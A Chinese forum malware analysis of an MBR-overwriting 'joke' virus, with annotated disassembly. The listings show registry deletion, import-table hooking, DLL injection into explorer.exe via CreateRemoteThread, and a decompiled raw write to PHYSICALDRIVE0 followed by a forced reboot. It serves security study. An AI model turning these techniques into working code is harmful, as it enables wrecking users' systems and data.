好友
阅读权限30
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 JoyChou 于 2013-7-14 18:21 编辑
基本信息: 报告名称:OhMyGod 病毒分析
作者:JoyChou
样本类型:MBR感染
样本文件大小: 268 KB (274,432 字节)
样本MD5: 3AE53CB468E2DF56A3E424E934BF30CF
壳信息:无壳
简介
该样本是一个修改MBR的玩笑病毒。
被感染的系统症状
感染该样本后,重启电脑电脑将无法正常启动,只会显示一窜字符串。
文件系统变化
修改MBR,释放rand().txt以及rand().dll
注册表变化
删除HKEN_CURRENT_USER子健Keyboard Layout\Preload,删除输入法
网络症状 无
[AppleScript] 纯文本查看 复制代码 来到OEP,看到几个关键call,每个都详细分析下
004017A0 /$ E8 FBFEFFFF call OhMyGod.004016A0
004017A5 |. E8 76FDFFFF call OhMyGod.00401520
004017AA |. E8 A1F8FFFF call OhMyGod.00401050
004017AF |. E8 5CFDFFFF call OhMyGod.00401510
004017B4 |. E8 C7F8FFFF call OhMyGod.00401080
004017B9 |. E8 92F9FFFF call OhMyGod.00401150
004017BE |. E8 0DFFFFFF call OhMyGod.004016D0
004017C3 |. E8 58F8FFFF call OhMyGod.00401020
004017C8 |. 6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
004017CA |. 68 1C914000 push OhMyGod.0040911C ; |111
004017CF |. 68 14914000 push OhMyGod.00409114 ; |Good
004017D4 |. 6A 00 push 0x0 ; |hOwner = NULL
004017D6 |. FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
004017DC |. E8 EFFAFFFF call OhMyGod.004012D0
004017E1 |. 6A 00 push 0x0
004017E3 |. 6A 02 push 0x2
004017E5 |. E8 B6FCFFFF call OhMyGod.004014A0
004017EA |. 83C4 08 add esp,0x8
004017ED \. C3 retn
004017A0 /$ E8 FBFEFFFF call OhMyGod.004016A0 这个call 进入
004016A0 |$ 6A 00 push 0x0 ; /pThreadId = NULL
004016A2 |. 6A 00 push 0x0 ; |CreationFlags = 0
004016A4 |. 6A 00 push 0x0 ; |pThreadParm = NULL
004016A6 |. 68 60154000 push OhMyGod.00401560 ; |创建一个线程,来到线程函数
004016AB |. 6A 00 push 0x0 ; |StackSize = 0
004016AD |. 6A 00 push 0x0 ; |pSecurity = NULL
004016AF |. FF15 74804000 call dword ptr ds:[<&KERNEL32.CreateThre>; \CreateThread
004016B5 |. 50 push eax ; /hObject
004016B6 |. FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandl>; \CloseHandle
004016BC \.^ E9 CFFFFFFF jmp OhMyGod.00401690
我们来到线程函数
00401560 . 83EC 0C sub esp,0xC
00401563 . 53 push ebx
00401564 . 55 push ebp
00401565 . 56 push esi
00401566 . 57 push edi
00401567 . E8 E4FAFFFF call OhMyGod.00401050 ; //删除注册表信息(这个call就没有进去了,很简单的)
0040156C . 33DB xor ebx,ebx
0040156E . 68 3F000F00 push 0xF003F
00401573 . 53 push ebx
00401574 . 53 push ebx
00401575 . FF15 04804000 call dword ptr ds:[<&ADVAPI32.OpenSCMana>; 打开服务管理器,SCM是服务管理器的意思
0040157B . 8BE8 mov ebp,eax
0040157D . 3BEB cmp ebp,ebx
0040157F . 75 0C jnz XOhMyGod.0040158D
00401581 . 5F pop edi
00401582 . 5E pop esi
00401583 . 5D pop ebp
00401584 . 33C0 xor eax,eax
00401586 . 5B pop ebx
00401587 . 83C4 0C add esp,0xC
0040158A . C2 0400 retn 0x4
0040158D > 8D4424 14 lea eax,dword ptr ss:[esp+0x14]
00401591 . 8B3D 08804000 mov edi,dword ptr ds:[<&ADVAPI32.EnumSer>; advapi32.EnumServicesStatusA
00401597 . 53 push ebx ; /pResumeHandle
00401598 . 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14] ; |
0040159C . 50 push eax ; |pCount
0040159D . 51 push ecx ; |pBytesNeeded
0040159E . 53 push ebx ; |BufSize
0040159F . 53 push ebx ; |pEnumStatus
004015A0 . 6A 03 push 0x3 ; |ServiceState = 3
004015A2 . 6A 3B push 0x3B ; |ServiceType = SERVICE_KERNEL_DRIVER|SERVICE_FILE_SYSTEM_DRIVER|SERVICE_RECOGNIZER_DRIVER|SERVICE_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS
004015A4 . 55 push ebp ; |hManager
004015A5 . 895C24 34 mov dword ptr ss:[esp+0x34],ebx ; |
004015A9 . 895C24 30 mov dword ptr ss:[esp+0x30],ebx ; |
004015AD . FFD7 call edi ; \枚举服务
004015AF . 8B5424 10 mov edx,dword ptr ss:[esp+0x10]
004015B3 . 52 push edx ; /Size
004015B4 . 6A 40 push 0x40 ; |Flags = LPTR
004015B6 . FF15 70804000 call dword ptr ds:[<&KERNEL32.LocalAlloc>; \LocalAlloc ;分配内存
004015BC . 8BF0 mov esi,eax
004015BE . 3BF3 cmp esi,ebx
004015C0 . 75 13 jnz XOhMyGod.004015D5
004015C2 . 55 push ebp
004015C3 . FF15 0C804000 call dword ptr ds:[<&ADVAPI32.CloseServi>; 关闭服务
004015C9 . 5F pop edi
004015CA . 5E pop esi
004015CB . 5D pop ebp
004015CC . 33C0 xor eax,eax
004015CE . 5B pop ebx
004015CF . 83C4 0C add esp,0xC
004015D2 . C2 0400 retn 0x4
下面来看第二个call
004017A5 |. E8 76FDFFFF call OhMyGod.00401520
我们进入
00401520 /$ 68 E0904000 push OhMyGod.004090E0 ; /jinguizi
00401525 |. 6A 00 push 0x0 ; |InitialOwner = FALSE
00401527 |. 6A 00 push 0x0 ; |pSecurity = NULL
00401529 |. FF15 68804000 call dword ptr ds:[<&KERNEL32.CreateMute>; \创建一个名为JinGuiZi的互斥对象,功能只能运行一次当前程序,不能双开
0040152F |. 85C0 test eax,eax
00401531 |. 74 26 je XOhMyGod.00401559
00401533 |. FF15 C0804000 call dword ptr ds:[<&KERNEL32.GetLastErr>; [GetLastError
00401539 |. 3D B7000000 cmp eax,0xB7
0040153E |. 75 19 jnz XOhMyGod.00401559
00401540 |. 6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
00401542 |. 6A 00 push 0x0 ; |Title = NULL
00401544 |. 68 CC904000 push OhMyGod.004090CC ; |只能有一个程序运行
00401549 |. 6A 00 push 0x0 ; |hOwner = NULL
0040154B |. FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
00401551 |. 6A 00 push 0x0 ; /ExitCode = 0
00401553 |. FF15 60804000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
00401559 \> C3 retn
下面我们进入004017AA |. E8 A1F8FFFF call OhMyGod.00401050第三个call
还是打开注册表,删除子键
00401050 /$ 51 push ecx ; 删除HKEN_CURRENT_USER子健Keyboard Layout\Preload
00401051 |. 8D4424 00 lea eax,dword ptr ss:[esp]
00401055 |. 50 push eax ; /pHandle
00401056 |. 6A 08 push 0x8 ; |Access = KEY_ENUMERATE_SUB_KEYS
00401058 |. 6A 00 push 0x0 ; |Reserved = 0
0040105A |. 68 44904000 push OhMyGod.00409044 ; |Keyboard Layout\Preload
0040105F |. 68 01000080 push 0x80000001 ; |hKey = HKEY_CURRENT_USER
00401064 |. FF15 1C804000 call dword ptr ds:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
0040106A |. 68 44904000 push OhMyGod.00409044 ; /Keyboard Layout\Preload
0040106F |. 68 01000080 push 0x80000001 ; |hKey = HKEY_CURRENT_USER
00401074 |. FF15 20804000 call dword ptr ds:[<&ADVAPI32.RegDeleteK>; \RegDeleteKeyA
0040107A |. 59 pop ecx
0040107B \. C3 retn
下面看004017AF |. E8 5CFDFFFF call OhMyGod.00401510第四个call
00401510 /$ 6A 00 push 0x0 ; /Enable = FALSE
00401512 |. FF15 60814000 call dword ptr ds:[<&USER32.GetForegroun>; |[GetForegroundWindow
00401518 |. 50 push eax ; |hWnd
00401519 |. FF15 50814000 call dword ptr ds:[<&USER32.EnableWindow>; \EnableWindow
0040151F \. C3 retn
再看004017B4 |. E8 C7F8FFFF call OhMyGod.00401080第五个call
00401080 /$ 81EC 04010000 sub esp,0x104
00401086 |. 8D4424 04 lea eax,dword ptr ss:[esp+0x4]
0040108A |. 68 00050000 push 0x500 ; /BufSize = 500 (1280.)
0040108F |. 50 push eax ; |Buffer
00401090 |. FF15 B4804000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00401096 |. 85C0 test eax,eax
00401098 |. 75 14 jnz XOhMyGod.004010AE
0040109A |. 68 78904000 push OhMyGod.00409078
0040109F |. E8 62080000 call OhMyGod.00401906
004010A4 |. 83C4 04 add esp,0x4
004010A7 |. 81C4 04010000 add esp,0x104
004010AD |. C3 retn
004010AE |> 56 push esi
004010AF |. 6A 00 push 0x0
004010B1 |. E8 74070000 call OhMyGod.0040182A
004010B6 |. 50 push eax
004010B7 |. E8 46070000 call OhMyGod.00401802
004010BC |. E8 4B070000 call OhMyGod.0040180C ; 获取一个随机数,然后以这个随机数命名新建的txt,YY用
004010C1 |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
004010C5 |. 68 0C184000 push OhMyGod.0040180C ; /<%ld> = 40180C (4200460.)
004010CA |. 51 push ecx ; |<%s>
004010CB |. 8D9424 980000>lea edx,dword ptr ss:[esp+0x98] ; |
004010D2 |. 68 6C904000 push OhMyGod.0040906C ; |Format = "%s\%ld.txt"
004010D7 |. 52 push edx ; |s
004010D8 |. FF15 58814000 call dword ptr ds:[<&USER32.wsprintfA>] ; \wsprintfA
004010DE |. 83C4 18 add esp,0x18
004010E1 |. 8D8424 880000>lea eax,dword ptr ss:[esp+0x88] ; 在windows目录下创建rand().txt文件
004010E8 |. 6A 00 push 0x0 ; /hTemplateFile = NULL
004010EA |. 68 80000000 push 0x80 ; |Attributes = NORMAL
004010EF |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
004010F1 |. 6A 00 push 0x0 ; |pSecurity = NULL
004010F3 |. 6A 02 push 0x2 ; |ShareMode = FILE_SHARE_WRITE
004010F5 |. 68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
004010FA |. 50 push eax ; |FileName
004010FB |. FF15 B8804000 call dword ptr ds:[<&KERNEL32.CreateFile>; \CreateFileA
00401101 |. 8D4C24 04 lea ecx,dword ptr ss:[esp+0x4] ; 写入“金龟子真棒”
00401105 |. 6A 00 push 0x0 ; /pOverlapped = NULL
00401107 |. 51 push ecx ; |pBytesWritten
00401108 |. 8BF0 mov esi,eax ; |
0040110A |. 6A 0E push 0xE ; |nBytesToWrite = E (14.)
0040110C |. 68 5C904000 push OhMyGod.0040905C ; |Buffer = OhMyGod.0040905C
00401111 |. 56 push esi ; |hFile
00401112 |. FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>>; \WriteFile
00401118 |. 56 push esi ; /hObject
00401119 |. FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandl>; \CloseHandle
0040111F |. E8 2CFFFFFF call OhMyGod.00401050
00401124 |. 5E pop esi
00401125 |. 81C4 04010000 add esp,0x104
0040112B \. C3 retn
我们进去这个004010B1 |. E8 74070000 call OhMyGod.0040182A看下
获取随机数
在看第六个call之前,我们看下母本的输入表
输入表
[AppleScript] 纯文本查看 复制代码 接着,继续
00401150 /$ 83EC 24 sub esp,0x24
00401153 |. 53 push ebx
00401154 |. 56 push esi
00401155 |. 57 push edi ; 获取当前进程
00401156 |. 6A 00 push 0x0 ; /pModule = NULL
00401158 |. FF15 64804000 call dword ptr ds:[<&KERNEL32.GetModuleHandleA>] ; \GetModuleHandleA
0040115E |. 8BF8 mov edi,eax
00401160 |. 8B47 3C mov eax,dword ptr ds:[edi+0x3C] ; 获取PE头
00401163 |. 8BB438 800000>mov esi,dword ptr ds:[eax+edi+0x80] ; 获取输入表
0040116A |. 8B443E 10 mov eax,dword ptr ds:[esi+edi+0x10] ; 获取IAT
0040116E |. 03F7 add esi,edi
00401170 |. 85C0 test eax,eax
00401172 |. 74 21 je XOhMyGod.00401195
00401174 |. 8B1D 9C804000 mov ebx,dword ptr ds:[<&KERNEL32.lstrcmpiA>] ; 将lstrcmpiA函数地址给ebx
0040117A |> 8B46 0C /mov eax,dword ptr ds:[esi+0xC] ; 获取输入表名字
0040117D |. 68 8C904000 |push OhMyGod.0040908C ; ASCII "USER32.DLL"
00401182 |. 03C7 |add eax,edi
00401184 |. 50 |push eax
00401185 |. FFD3 |call ebx
00401187 |. 85C0 |test eax,eax ; 判断是否为user32.dll
00401189 |. 74 0A |je XOhMyGod.00401195
0040118B |. 8B46 24 |mov eax,dword ptr ds:[esi+0x24]
0040118E |. 83C6 14 |add esi,0x14 ; 加上一整个输入表的大小0x14
00401191 |. 85C0 |test eax,eax
00401193 |.^ 75 E5 \jnz XOhMyGod.0040117A
00401195 |> 8B76 10 mov esi,dword ptr ds:[esi+0x10] ; 将user32.dll的IAT给esi
00401198 |. 85F6 test esi,esi
0040119A |. 74 6C je XOhMyGod.00401208
0040119C |. 8B043E mov eax,dword ptr ds:[esi+edi]
0040119F |. 03F7 add esi,edi
004011A1 |. 85C0 test eax,eax
004011A3 |. 74 63 je XOhMyGod.00401208
004011A5 |. 8B1D A0804000 mov ebx,dword ptr ds:[<&KERNEL32.VirtualQuery>] ; kernel32.VirtualQuery
004011AB |. 8B3D A4804000 mov edi,dword ptr ds:[<&KERNEL32.VirtualProtect>] ; kernel32.VirtualProtect
004011B1 |. 55 push ebp
004011B2 |. 8B2D A8804000 mov ebp,dword ptr ds:[<&KERNEL32.WriteProcessMemory>] ; kernel32.WriteProcessMemory
004011B8 |> 3B05 E8BA4000 /cmp eax,dword ptr ds:[0x40BAE8] ; user32.MessageBoxA
004011BE |. 75 3D |jnz XOhMyGod.004011FD
004011C0 |. 8D4C24 18 |lea ecx,dword ptr ss:[esp+0x18]
004011C4 |. 6A 1C |push 0x1C
004011C6 |. 51 |push ecx
004011C7 |. 56 |push esi
004011C8 |. FFD3 |call ebx ; // VirtualQuery
004011CA |. 8D5424 14 |lea edx,dword ptr ss:[esp+0x14]
004011CE |. 52 |push edx
004011CF |. 6A 04 |push 0x4
004011D1 |. 6A 04 |push 0x4
004011D3 |. 56 |push esi
004011D4 |. FFD7 |call edi ; // VirtualProtect
004011D6 |. 6A 00 |push 0x0
004011D8 |. 8D4424 14 |lea eax,dword ptr ss:[esp+0x14]
004011DC |. 6A 04 |push 0x4 ; 4个字节大小
004011DE |. 50 |push eax ; 将MessageBoxA函数地址入栈
004011DF |. 56 |push esi
004011E0 |. C74424 20 301>|mov dword ptr ss:[esp+0x20],OhMyGod.00401130
004011E8 |. FF15 AC804000 |call dword ptr ds:[<&KERNEL32.GetCurrentProcess>] ; GetCurrentProcess
004011EE |. 50 |push eax
004011EF |. FFD5 |call ebp ; // WriteProcessMerory
004011F1 |. 8B4C24 14 |mov ecx,dword ptr ss:[esp+0x14] ; 将MessageBoxA函数地址写入到esi
004011F5 |. 6A 00 |push 0x0
004011F7 |. 51 |push ecx
004011F8 |. 6A 04 |push 0x4
004011FA |. 56 |push esi
004011FB |. FFD7 |call edi ; // VirtualProtect
004011FD |> 8B46 04 |mov eax,dword ptr ds:[esi+0x4] ; 找到MessageBoxA函数地址,在弹出goodjob的时候就利用这个地址
00401200 |. 83C6 04 |add esi,0x4
00401203 |. 85C0 |test eax,eax
00401205 |.^ 75 B1 \jnz XOhMyGod.004011B8
00401207 |. 5D pop ebp
00401208 |> 5F pop edi
00401209 |. 5E pop esi
0040120A |. 5B pop ebx
0040120B |. 83C4 24 add esp,0x24
0040120E \. C3 retn
下面看第七个call 004017BE |. E8 0DFFFFFF call OhMyGod.004016D0
进去
过程是,先获取当前出现名字,打开文件,获取文件大小,申请一块文件大小的空间,
再把申请的地址内容全部读入到一个buffer,最后写入到创建的GuiZi.exe完成自我复制的功能。
004016D0 /$ 81EC 84000000 sub esp,0x84 ; 作者本意是复制自己文件到系统目录下的GuiZi.exe,可是,没成功
没成功的原因是:CreateFile API第二个参数应该是GENERIC_READ,因为要读取
004016D6 |. 53 push ebx ; 不过为什么不直接用CopyFile呢
004016D7 |. 56 push esi
004016D8 |. 57 push edi
004016D9 |. B9 1F000000 mov ecx,0x1F
004016DE |. 33C0 xor eax,eax
004016E0 |. 8D7C24 11 lea edi,dword ptr ss:[esp+0x11]
004016E4 |. C64424 10 00 mov byte ptr ss:[esp+0x10],0x0
004016E9 |. 68 80000000 push 0x80 ; /BufSize = 80 (128.)
004016EE |. F3:AB rep stos dword ptr es:[edi] ; |
004016F0 |. 66:AB stos word ptr es:[edi] ; |
004016F2 |. AA stos byte ptr es:[edi] ; |
004016F3 |. 8D4424 14 lea eax,dword ptr ss:[esp+0x14] ; |
004016F7 |. 50 push eax ; |PathBuffer
004016F8 |. 6A 00 push 0x0 ; |hModule = NULL
004016FA |. FF15 80804000 call dword ptr ds:[<&KERNEL32.GetModuleFileNameA>>; \GetModuleFileNameA
00401700 |. 8B1D B8804000 mov ebx,dword ptr ds:[<&KERNEL32.CreateFileA>] ; kernel32.CreateFileA
00401706 |. 6A 00 push 0x0 ; /hTemplateFile = NULL
00401708 |. 68 80000000 push 0x80 ; |Attributes = NORMAL
0040170D |. 6A 03 push 0x3 ; |Mode = OPEN_EXISTING
0040170F |. 6A 00 push 0x0 ; |pSecurity = NULL
00401711 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401713 |. 8D4C24 24 lea ecx,dword ptr ss:[esp+0x24] ; |
00401717 |. 68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
0040171C |. 51 push ecx ; |FileName
0040171D |. FFD3 call ebx ; \CreateFileA
0040171F |. 8D5424 0C lea edx,dword ptr ss:[esp+0xC]
00401723 |. 8BF0 mov esi,eax
00401725 |. 52 push edx ; /pFileSizeHigh
00401726 |. 56 push esi ; |hFile
00401727 |. FF15 7C804000 call dword ptr ds:[<&KERNEL32.GetFileSize>] ; \GetFileSize
0040172D |. 8B4424 0C mov eax,dword ptr ss:[esp+0xC]
00401731 |. 6A 04 push 0x4 ; /flProtect = 4
00401733 |. 68 00100000 push 0x1000 ; |flAllocationType = 1000 (4096.)
00401738 |. 50 push eax ; |dwSize
00401739 |. 6A 00 push 0x0 ; |lpAddress = NULL
0040173B |. 6A 00 push 0x0 ; |hProcess = NULL
0040173D |. FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAllocEx>] ; \VirtualAllocEx
00401743 |. 8B5424 0C mov edx,dword ptr ss:[esp+0xC]
00401747 |. 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC]
0040174B |. 6A 00 push 0x0 ; /pOverlapped = NULL
0040174D |. 8BF8 mov edi,eax ; |
0040174F |. 51 push ecx ; |pBytesRead
00401750 |. 52 push edx ; |BytesToRead
00401751 |. 57 push edi ; |Buffer
00401752 |. 56 push esi ; |hFile
00401753 |. FF15 78804000 call dword ptr ds:[<&KERNEL32.ReadFile>] ; \ReadFile
00401759 |. 6A 00 push 0x0 ; /hTemplateFile = NULL
0040175B |. 68 80000000 push 0x80 ; |Attributes = NORMAL
00401760 |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00401762 |. 6A 00 push 0x0 ; |pSecurity = NULL
00401764 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401766 |. 68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
0040176B |. 68 F4904000 push OhMyGod.004090F4 ; |FileName = "C:\WINDOWS\SYSTEM32\GuiZi.exe"
00401770 |. FFD3 call ebx ; \CreateFileA
00401772 |. 8B4C24 0C mov ecx,dword ptr ss:[esp+0xC]
00401776 |. 8BD8 mov ebx,eax
00401778 |. 8D4424 0C lea eax,dword ptr ss:[esp+0xC]
0040177C |. 6A 00 push 0x0 ; /pOverlapped = NULL
0040177E |. 50 push eax ; |pBytesWritten
0040177F |. 51 push ecx ; |nBytesToWrite
00401780 |. 57 push edi ; |Buffer
00401781 |. 53 push ebx ; |hFile
00401782 |. FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
00401788 |. 8B3D B0804000 mov edi,dword ptr ds:[<&KERNEL32.CloseHandle>] ; kernel32.CloseHandle
0040178E |. 53 push ebx ; /hObject
0040178F |. FFD7 call edi ; \CloseHandle
00401791 |. 56 push esi ; /hObject
00401792 |. FFD7 call edi ; \CloseHandle
00401794 |. 5F pop edi
00401795 |. 5E pop esi
00401796 |. 5B pop ebx ; 7FFDE000
00401797 |. 81C4 84000000 add esp,0x84
0040179D \. C3 retn
再看第八个call 004017C3 |. E8 58F8FFFF call OhMyGod.00401020
完成对ASCII "Shabisafhlfiakhfdka"解密, “Shbeo}p{剱摖9孟 荏?K”,目测是个干扰,没用的地方
第9个call就弹一个提示框,我们跳过
再看第十个call 004017DC |. E8 EFFAFFFF call OhMyGod.004012D0 这个call
功能:创建一个rand().dll,并LoadLibraryA(rand().dll),注入到桌面进程,方便系统中招。
004012D0 /$ 81EC 28010000 sub esp,0x128
004012D6 |. 53 push ebx
004012D7 |. 55 push ebp
004012D8 |. 56 push esi
004012D9 |. 57 push edi
004012DA |. 33FF xor edi,edi
004012DC |. C74424 10 280>mov dword ptr ss:[esp+0x10],0x128
004012E4 |. 57 push edi ; /ProcessID => 0
004012E5 |. 6A 02 push 0x2 ; |Flags = TH32CS_SNAPPROCESS
004012E7 |. E8 10050000 call <jmp.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
004012EC |. 8BE8 mov ebp,eax
004012EE |. 8D4424 10 lea eax,dword ptr ss:[esp+0x10]
004012F2 |. 50 push eax ; /lppe
004012F3 |. 55 push ebp ; |hSnapshot
004012F4 |. E8 FD040000 call <jmp.&KERNEL32.Process32First> ; \Process32First
004012F9 |. 85C0 test eax,eax
004012FB |. 74 4F je XOhMyGod.0040134C
004012FD |> BE A8904000 /mov esi,OhMyGod.004090A8 ; ASCII "explorer.exe"
00401302 |. 8D4424 34 |lea eax,dword ptr ss:[esp+0x34]
00401306 |> 8A10 |/mov dl,byte ptr ds:[eax]
00401308 |. 8A1E ||mov bl,byte ptr ds:[esi]
0040130A |. 8ACA ||mov cl,dl
0040130C |. 3AD3 ||cmp dl,bl
0040130E |. 75 1E ||jnz XOhMyGod.0040132E
00401310 |. 84C9 ||test cl,cl
00401312 |. 74 16 ||je XOhMyGod.0040132A
00401314 |. 8A50 01 ||mov dl,byte ptr ds:[eax+0x1]
00401317 |. 8A5E 01 ||mov bl,byte ptr ds:[esi+0x1]
0040131A |. 8ACA ||mov cl,dl
0040131C |. 3AD3 ||cmp dl,bl
0040131E |. 75 0E ||jnz XOhMyGod.0040132E
00401320 |. 83C0 02 ||add eax,0x2
00401323 |. 83C6 02 ||add esi,0x2
00401326 |. 84C9 ||test cl,cl
00401328 |.^ 75 DC |\jnz XOhMyGod.00401306
0040132A |> 33C0 |xor eax,eax
0040132C |. EB 05 |jmp XOhMyGod.00401333
0040132E |> 1BC0 |sbb eax,eax
00401330 |. 83D8 FF |sbb eax,-0x1
00401333 |> 85C0 |test eax,eax
00401335 |. 74 11 |je XOhMyGod.00401348
00401337 |. 8D4424 10 |lea eax,dword ptr ss:[esp+0x10]
0040133B |. 50 |push eax ; /lppe
0040133C |. 55 |push ebp ; |hSnapshot
0040133D |. E8 AE040000 |call <jmp.&KERNEL32.Process32Next> ; \Process32Next
00401342 |. 85C0 |test eax,eax
00401344 |.^ 75 B7 \jnz XOhMyGod.004012FD
00401346 |. EB 04 jmp XOhMyGod.0040134C
00401348 |> 8B7C24 18 mov edi,dword ptr ss:[esp+0x18]
0040134C |> 57 push edi ; /ProcessId
0040134D |. 6A 00 push 0x0 ; |Inheritable = FALSE
0040134F |. 68 FF0F1F00 push 0x1F0FFF ; |Access = PROCESS_ALL_ACCESS
00401354 |. FF15 4C804000 call dword ptr ds:[<&KERNEL32.OpenProces>; \OpenProcess
0040135A |. 8BF0 mov esi,eax
0040135C |. E8 AFFEFFFF call OhMyGod.00401210 ; 在系统目录创建一个rand().dll,写入MBR使用
00401361 |. 8BD8 mov ebx,eax
00401363 |. 83C9 FF or ecx,0xFFFFFFFF
00401366 |. 8BFB mov edi,ebx
00401368 |. 33C0 xor eax,eax
0040136A |. F2:AE repne scas byte ptr es:[edi]
0040136C |. F7D1 not ecx
0040136E |. 6A 04 push 0x4 ; /flProtect = 4
00401370 |. 49 dec ecx ; |
00401371 |. 68 00100000 push 0x1000 ; |flAllocationType = 1000 (4096.)
00401376 |. 51 push ecx ; |dwSize
00401377 |. 50 push eax ; |lpAddress => NULL
00401378 |. 56 push esi ; |hProcess
00401379 |. FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAll>; \VirtualAllocEx
0040137F |. 8BE8 mov ebp,eax
00401381 |. 8BFB mov edi,ebx
00401383 |. 83C9 FF or ecx,0xFFFFFFFF
00401386 |. 33C0 xor eax,eax
00401388 |. F2:AE repne scas byte ptr es:[edi]
0040138A |. F7D1 not ecx
0040138C |. 49 dec ecx
0040138D |. 6A 00 push 0x0 ; /pBytesWritten = NULL
0040138F |. 51 push ecx ; |BytesToWrite
00401390 |. 53 push ebx ; |Buffer
00401391 |. 55 push ebp ; |Address
00401392 |. 56 push esi ; |hProcess
00401393 |. FF15 A8804000 call dword ptr ds:[<&KERNEL32.WriteProce>; \WriteProcessMemory
00401399 |. 8B0D 44804000 mov ecx,dword ptr ds:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA
0040139F |. 6A 00 push 0x0 ; /lpThreadId = NULL
004013A1 |. 6A 00 push 0x0 ; |dwCreationFlags = 0
004013A3 |. 55 push ebp ; |lpParameter
004013A4 |. 51 push ecx ; |lpStartAddress => kernel32.LoadLibraryA
004013A5 |. 6A 00 push 0x0 ; |dwStackSize = 0
004013A7 |. 6A 00 push 0x0 ; |lpThreadAttributes
004013A9 |. 56 push esi ; |hProcess
004013AA |. FF15 40804000 call dword ptr ds:[<&KERNEL32.CreateRemo>; \CreateRemoteThread
004013B0 |. 8BF8 mov edi,eax
004013B2 |. 6A FF push -0x1 ; /Timeout = INFINITE
004013B4 |. 57 push edi ; |hObject
004013B5 |. FF15 3C804000 call dword ptr ds:[<&KERNEL32.WaitForSin>; \WaitForSingleObject
004013BB |. 68 00800000 push 0x8000 ; /dwFreeType = 8000 (32768.)
004013C0 |. 6A 00 push 0x0 ; |dwSize = 0
004013C2 |. 55 push ebp ; |lpAddress
004013C3 |. 56 push esi ; |hProcess
004013C4 |. FF15 38804000 call dword ptr ds:[<&KERNEL32.VirtualFre>; \VirtualFreeEx
004013CA |. 56 push esi ; /hObject
004013CB |. 8B35 B0804000 mov esi,dword ptr ds:[<&KERNEL32.CloseHa>; |kernel32.CloseHandle
004013D1 |. FFD6 call esi ; \CloseHandle
004013D3 |. 57 push edi ; /hObject
004013D4 |. FFD6 call esi ; \CloseHandle
004013D6 |. 5F pop edi
004013D7 |. 5E pop esi
004013D8 |. 5D pop ebp
004013D9 |. 5B pop ebx
004013DA |. 81C4 28010000 add esp,0x128
004013E0 \. C3 retn
看最后一个call 004017E5 |. E8 B6FCFFFF call OhMyGod.004014A0
获取系统版本,然后重启,当然MBR被恶意修改了,就不能进入系统了
004014A0 /$ 8B4424 04 mov eax,dword ptr ss:[esp+0x4]
004014A4 |. 81EC 94000000 sub esp,0x94
004014AA |. 85C0 test eax,eax
004014AC |. 74 13 je XOhMyGod.004014C1
004014AE |. 83F8 02 cmp eax,0x2
004014B1 |. 74 0E je XOhMyGod.004014C1
004014B3 |. 83F8 01 cmp eax,0x1
004014B6 |. 74 09 je XOhMyGod.004014C1
004014B8 |. 33C0 xor eax,eax
004014BA |. 81C4 94000000 add esp,0x94
004014C0 |. C3 retn
004014C1 |> 57 push edi
004014C2 |. B9 24000000 mov ecx,0x24
004014C7 |. 33C0 xor eax,eax
004014C9 |. 8D7C24 08 lea edi,dword ptr ss:[esp+0x8]
004014CD |. F3:AB rep stos dword ptr es:[edi]
004014CF |. 8D4424 04 lea eax,dword ptr ss:[esp+0x4]
004014D3 |. C74424 04 940>mov dword ptr ss:[esp+0x4],0x94
004014DB |. 50 push eax ; /pVersionInformation
004014DC |. FF15 5C804000 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
004014E2 |. 85C0 test eax,eax
004014E4 |. 5F pop edi
004014E5 |. 75 07 jnz XOhMyGod.004014EE
004014E7 |. 81C4 94000000 add esp,0x94
004014ED |. C3 retn
004014EE |> 837C24 10 02 cmp dword ptr ss:[esp+0x10],0x2
004014F3 |. 75 05 jnz XOhMyGod.004014FA
004014F5 |. E8 F6FEFFFF call OhMyGod.004013F0
004014FA |> 6A 00 push 0x0 ; /Reserved = 0
004014FC |. 6A 06 push 0x6 ; |Options = EWX_REBOOT|EWX_FORCE
004014FE |. FF15 54814000 call dword ptr ds:[<&USER32.ExitWindowsE>; \ExitWindowsEx
00401504 |. 81C4 94000000 add esp,0x94
0040150A \. C3 retn
在看MBR之前,我们看下那个dll,用IDA静态看下
发现只有DllMain一个函数,发现是这个样子
strcpy((char *)FileName, "\\\\.\\PHYSICALDRIVE0");
CreateFileA(FileName, 0xC0000000u, 0, 0, 3u, 0x80u, 0);
WriteFile(hObject, &Buffer, 0x200u, &NumberOfBytesWritten, 0);
